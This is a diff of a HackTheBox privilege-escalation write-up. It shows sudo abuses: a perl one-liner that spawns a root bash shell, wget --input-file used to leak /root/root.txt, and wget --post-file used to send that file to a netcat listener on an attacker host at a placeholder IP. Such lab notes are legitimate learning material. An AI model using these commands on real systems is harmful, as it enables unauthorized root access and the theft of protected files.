Chittu13/hackthebox/Privilege.md

   - ```sudo perl -e 'exec "/bin/bash";'```

 # easy way to get root/root.txt <a name="root.txt"></a>
-1️⃣ Read the Root Flag Using --input-file:
+### 1️⃣ Read the Root Flag Using --input-file:

-Use a root-only file (/root/root.txt) as an input to wget.
+- Use a root-only file (/root/root.txt) as an input to wget.
-It will try to parse it as a URL, fail, and leak the content (flag) in the error.
+- It will try to parse it as a URL, fail, and leak the content (flag) in the error.

-sudo wget --input-file=/root/root.txt
+  - `sudo wget --input-file=/root/root.txt`

+### 2️⃣ Exfiltrate the Flag Using --post-file:
+- Use wget to send the flag to your attack machine.
+- Steps:
+  - 1. On your Kali machine, start a netcat listener:
+    - `nc -lnvp 443`
+  - 2. On the victim (sammy), run:
+    - `sudo wget --post-file=/root/root.txt http://<your-ip>:443/`
+- >The flag is sent to your listener.